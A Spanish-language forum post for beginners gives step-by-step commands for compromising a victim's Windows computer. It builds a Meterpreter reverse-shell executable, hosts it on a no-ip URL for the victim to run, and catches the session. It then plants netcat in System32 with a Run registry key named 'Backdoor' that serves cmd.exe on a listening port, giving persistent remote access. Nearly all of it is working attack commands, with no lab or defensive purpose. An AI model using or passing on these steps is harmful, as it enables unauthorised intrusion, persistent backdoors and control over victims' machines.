Antes que todo aclarar que este post es para Newbie (lo explico bien por eso)Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.
A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit
use exploit/multi/handler,
en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo
set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:
set lhost (y tu ip o no-ip) y
set lport ( y el puerto) vale,
ahora le damos run con
exploit -j Ok,
respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo:
http://minoip.no-ip.com/payload.exe (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos;
sessions -i 1Ahora para asegurarnos la víctima, le subiremos netcat (nc) con;
upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro
netcat;
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con;
upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos;
nc (su ip) 4447 (que es el puerto)Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...
